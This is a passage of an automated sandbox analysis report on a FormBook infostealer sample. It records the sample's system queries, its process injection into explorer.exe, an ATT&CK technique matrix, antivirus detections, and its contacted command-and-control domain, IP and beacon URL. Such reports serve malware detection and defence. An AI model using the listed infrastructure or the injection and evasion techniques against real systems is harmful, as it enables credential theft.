          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection712Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection712LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 452499 Sample: 9thuIDnsFV Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 5 other signatures 2->42 10 9thuIDnsFV.exe 5 2->10         started        process3 file4 28 C:\Users\user\AppData\...\9thuIDnsFV.exe, PE32 10->28 dropped 30 C:\Users\...\9thuIDnsFV.exe:Zone.Identifier, ASCII 10->30 dropped 32 C:\Users\user\AppData\...\9thuIDnsFV.exe.log, ASCII 10->32 dropped 52 Writes to foreign memory regions 10->52 54 Injects a PE file into a foreign processes 10->54 14 9thuIDnsFV.exe 10->14         started        signatures5 process6 signatures7 56 Multi AV Scanner detection for dropped file 14->56 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 3 other signatures 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 34 www.driplockerstore.com 5.79.68.101, 49756, 80 LEASEWEB-NL-AMS-01NetherlandsNL Netherlands 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 wlanext.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          9thuIDnsFV.exe39%VirustotalBrowse
          9thuIDnsFV.exe24%ReversingLabsByteCode-MSIL.Coinminer.BitCoinMiner

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe24%ReversingLabsByteCode-MSIL.Coinminer.BitCoinMiner

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.9thuIDnsFV.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.carterandcone.comces0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.carterandcone.comes0%URL Reputationsafe
          http://www.carterandcone.comes0%URL Reputationsafe
          http://www.carterandcone.comes0%URL Reputationsafe
          http://www.zhongyicts.com.cnr-fC0%Avira URL Cloudsafe
          http://www.carterandcone.comams0%Avira URL Cloudsafe
          http://www.carterandcone.comal0%URL Reputationsafe
          http://www.carterandcone.comal0%URL Reputationsafe
          http://www.carterandcone.comal0%URL Reputationsafe
          http://www.sandoll.co.krs-czom0%Avira URL Cloudsafe
          http://www.tiro.com-jpL0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.sandoll.co.krFc0%Avira URL Cloudsafe
          http://www.carterandcone.comroa0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.sajatypeworks.comG0%Avira URL Cloudsafe
          http://www.carterandcone.com.0%URL Reputationsafe
          http://www.carterandcone.com.0%URL Reputationsafe
          http://www.carterandcone.com.0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cnht0%URL Reputationsafe
          http://www.founder.com.cn/cnht0%URL Reputationsafe
          http://www.founder.com.cn/cnht0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.zhongyicts.com.cncr0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.sajatypeworks.comM0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          www.containerflippers.com/np0c/0%Avira URL Cloudsafe
          http://www.urwpp.de00%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.carterandcone.comic0%URL Reputationsafe
          http://www.carterandcone.comic0%URL Reputationsafe
          http://www.carterandcone.comic0%URL Reputationsafe
          http://www.goodfont.co.k)0%Avira URL Cloudsafe
          http://www.carterandcone.comexc0%URL Reputationsafe
          http://www.carterandcone.comexc0%URL Reputationsafe
          http://www.carterandcone.comexc0%URL Reputationsafe
          http://www.founder.com.cn/cnMic0%Avira URL Cloudsafe
          http://www.carterandcone.come0%URL Reputationsafe
          http://www.carterandcone.come0%URL Reputationsafe
          http://www.carterandcone.come0%URL Reputationsafe
          http://www.carterandcone.comc0%URL Reputationsafe
          http://www.carterandcone.comc0%URL Reputationsafe
          http://www.carterandcone.comc0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comcr0%Avira URL Cloudsafe
          http://www.opera.com00%Avira URL Cloudsafe
          http://www.carterandcone.comlt0%URL Reputationsafe
          http://www.carterandcone.comlt0%URL Reputationsafe
          http://www.carterandcone.comlt0%URL Reputationsafe
          http://www.carterandcone.comaF0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnld0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htmm0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.driplockerstore.com
          5.79.68.101
          truetrue
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            www.containerflippers.com/np0c/true
            • Avira URL Cloud: safe
            low
            http://www.driplockerstore.com/np0c/?iN=5jalxB&a0DTBtU=a9fK2iRL7rM/iNgaQ8e4NUwl6BbikcR8OekOj0TYIdin2efeiFW0Z5kC5Xa/O1Kzq37GlajMhw==true
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.carterandcone.comces9thuIDnsFV.exe, 00000001.00000003.334310160.000000000616D000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.fontbureau.com/designersG9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
              high
              http://www.fontbureau.com/designers/?9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                high
                http://www.founder.com.cn/cn/bThe9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.carterandcone.comes9thuIDnsFV.exe, 00000001.00000003.334171892.000000000616D000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.fontbureau.com/designers?9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                  high
                  http://www.zhongyicts.com.cnr-fC9thuIDnsFV.exe, 00000001.00000003.333587115.000000000616D000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.carterandcone.comams9thuIDnsFV.exe, 00000001.00000003.334171892.000000000616D000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.carterandcone.comal9thuIDnsFV.exe, 00000001.00000003.334955370.000000000616B000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.sandoll.co.krs-czom9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.tiro.com-jpL9thuIDnsFV.exe, 00000001.00000003.333190214.0000000006173000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.tiro.comexplorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.sandoll.co.krFc9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.fontbureau.com/designersexplorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                    high
                    http://www.carterandcone.comroa9thuIDnsFV.exe, 00000001.00000003.334955370.000000000616B000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.goodfont.co.kr9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.carterandcone.com9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.sajatypeworks.comG9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.carterandcone.com.9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.sajatypeworks.com9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.founder.com.cn/cnht9thuIDnsFV.exe, 00000001.00000003.332056051.000000000616B000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.typography.netD9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.zhongyicts.com.cncr9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.founder.com.cn/cn/cThe9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.sajatypeworks.comM9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.galapagosdesign.com/staff/dennis.htm9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://fontfabrik.com9thuIDnsFV.exe, 00000001.00000003.329336409.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designersa9thuIDnsFV.exe, 00000001.00000003.339673222.000000000616B000.00000004.00000001.sdmpfalse
                      high
                      http://www.urwpp.de09thuIDnsFV.exe, 00000001.00000003.338500432.0000000006171000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.galapagosdesign.com/DPlease9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.ascendercorp.com/typedesigners.html9thuIDnsFV.exe, 00000001.00000003.336235888.0000000006173000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.336179079.0000000006173000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.fonts.com9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                        high
                        http://www.sandoll.co.kr9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designersers59thuIDnsFV.exe, 00000001.00000003.339673222.000000000616B000.00000004.00000001.sdmpfalse
                          high
                          http://www.urwpp.deDPlease9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
